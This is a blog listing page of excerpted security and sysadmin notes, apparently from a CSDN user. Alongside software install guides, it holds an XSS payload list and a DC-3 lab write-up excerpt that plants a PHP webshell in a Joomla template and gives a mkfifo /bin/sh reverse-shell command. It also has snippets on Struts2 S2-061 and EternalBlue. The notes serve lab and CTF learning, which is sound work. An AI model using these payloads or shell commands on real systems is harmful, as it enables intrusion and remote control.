笔记
文章平均质量分 57
魂梦aoin
这个作者很懒,什么都没留下…
展开
-
15ubuntu20.04离线安装openssh8.9.p1
一、依赖包安装 依赖包下载网址: https://debian.pkgs.org/sid/debian-main-amd64/ 下载好将依赖包放入/software,安装 mkdir /software cd /software dpkg -i libsepol1-dev_3.0-1_amd64.deb dpkg -i libselinux1-dev_3.0-1build2_amd64.deb dpkg -i libpam0g_1.3.1.11-1+dde_amd64.deb dpkg -i li原创 2022-03-21 14:00:30 · 5494 阅读 · 0 评论 -
2021-11-15xss笔记
<script>alert(1)</script> </script>"><script>prompt(1)</script> </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt> "><img src=x onerror=prompt(1)> "><svg/onload=prompt(1)> "><iframe/src=javas原创 2021-11-15 17:43:58 · 876 阅读 · 0 评论 -
14linux离线源码安装mysql8.0.26教程
离线源码安装mysql 1:下载tar包,如果有则直接使用 下载连接: https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz cd /home/dcsys/software ls 2:解压编译及安装mysql sudo tar zxf mysql-boost-8.0.26.tar.gz mv mysql-8.0.26/ /data/mysql-8.0.26 cd /data/m原创 2021-08-17 12:52:35 · 593 阅读 · 2 评论 -
11S2-061漏洞复现
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) 1.漏洞描述 S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。该漏洞影响版本范围是Struts 2.0.0到Struts 2.5.25。 2.参考链接 https://cwiki.apache.org/confluence/display/WW/S2-061 https://github.com/ka1n4t/CVE-2020-17530 htt原创 2020-12-30 22:48:48 · 193 阅读 · 0 评论 -
13http详解
HTTP/HTTPS的具体区别 HTTP简要通信过程: 1.建立连接–>2.发送请求数据包–>3.返回响应数据包–>4.关闭连接。 1.浏览器建立与web之间的连接 2.浏览器将请求数据打包(生成请求数据包)并发送到web服务器 3.web服务器将响应处理结果打包(生成响应数据包)并发送到web服务器。 4.web服务器关闭连接。 HTTPS简要通信过程: 1.浏览器发送请求–>2.服务器返回网站的证书信息–>3.进行证书校验,协商SSL连接的安全等级,生成密码、和公私钥。–&原创 2021-07-26 23:48:08 · 439 阅读 · 0 评论 -
12从kali移动硬盘安装、到主题。
前提 1.一个移动硬盘或者性能好点的U盘。 2.kali官方iso镜像,下载地址:点击以下载 3.分区工具:diskgenius 4.虚拟机VMware16.0 一、首先给我们的移动硬盘/U盘分区 我这里有一个300GB的移动硬盘,是我平时日常存放文件用的。当然这也不影响,我们给它分一个区专门安装linux系统。这样这个盘既可以日常存放资料,也可以作为便携式kali linux使用。 我们的kali需要3个分区: (1)大小约100MB的EFI启动分区 (2)大小约8GB的交换分区(swap) (3)大小约原创 2021-01-30 23:14:43 · 977 阅读 · 2 评论 -
10CTF01靶机渗透经历
123原创 2020-11-14 13:58:43 · 703 阅读 · 1 评论 -
09永恒之蓝与永恒之黑的复现
一、永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入原创 2020-08-15 18:08:39 · 1928 阅读 · 0 评论 -
08DC3后续提权过程
1.GetShell 寻找可以修改PHP文件的地方 Templates Beez3 Details and Files 写入一句话木马 木马地址: http://192.168.48.136/templates/beez3/html/yjh.php 用蚁剑连接 填写密码和地址 2.提权 反弹shell 攻击端监听端⼝等待回连 nc -lvvp 2333 靶机运行反弹shell命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&原创 2020-08-11 19:12:12 · 244 阅读 · 0 评论 -
07BugkuCTF的文件包含项目
进入BugkuCTF之前我们先了解一下文件包含的基础知识。 一、文件包含 1.概念 文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。 2.PHP 中的⽂件包含语句 PHP 提供了四个⽂件包含的语句,四个语句之间略有不同: 语句 区别 include() 多次包含,如果包含失败,脚本产⽣警告,继续运⾏。 include_once() ⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。 require() 多次原创 2020-08-05 21:19:19 · 540 阅读 · 0 评论 -
06跨站请求伪造(CSRF)与口令(密码)安全
一、跨站请求伪造 1.概述 黑客可以伪造管理员的正常请求,强制管理员给任意用户的发出各种请求。 (1)基本概念 跨站请求伪造(Cross Site Request Forgery,CSRF) 。 CSRF 是⼀种攻击,它强制终端⽤户在当前对其进⾏身份验证后的Web 应⽤程序上执⾏⾮本意操作的攻 击。 CSRF 攻击的重点在于更改状态的请求,⽽不是盗取数据,因为攻击者⽆法查看伪造请求的响应。 (2)关键点 受害者没有退出登录。 CS...原创 2020-08-03 20:48:12 · 351 阅读 · 0 评论